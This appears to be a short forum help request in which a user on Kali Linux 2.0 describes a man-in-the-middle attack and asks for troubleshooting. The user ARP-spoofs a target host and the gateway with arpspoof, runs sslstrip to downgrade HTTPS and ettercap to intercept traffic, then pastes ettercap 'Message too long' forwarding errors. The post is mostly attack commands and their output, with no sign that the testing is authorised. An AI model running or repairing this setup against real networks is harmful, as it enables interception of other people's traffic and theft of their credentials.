Im having issues forwarding packing using kali linux 2.0 gdm3

1# i edited my ip_forward file to 1


2# This is my first time using arpspoof i poisoned my target ip's


$sudo arpspoof -t 172.16.1.55 172.16.1.1 -i bond0
$sudo arpspoof -t 172.16.1.1 172.16.1.55 -i bond0


2#Then i use sslstrip...


$sudo sslstrip -a -k -f

sslstrip 0.9 by Moxie Marlinspike running...



3# Now i run ettercap

$sudo ettercap -T -q -i bond0



#this is where i run into a issues i start recieving these errors an my target cannot reach the internet



SEND L3 ERROR: 4180 byte packet (0800:06) destined to 172.16.1.55 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)
SEND L3 ERROR: 2800 byte packet (0800:06) destined to 172.16.1.55 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)
SEND L3 ERROR: 2800 byte packet (0800:06) destined to 172.16.1.55 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)
SEND L3 ERROR: 2800 byte packet (0800:06) destined to 172.16.1.55 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)


THANK YOU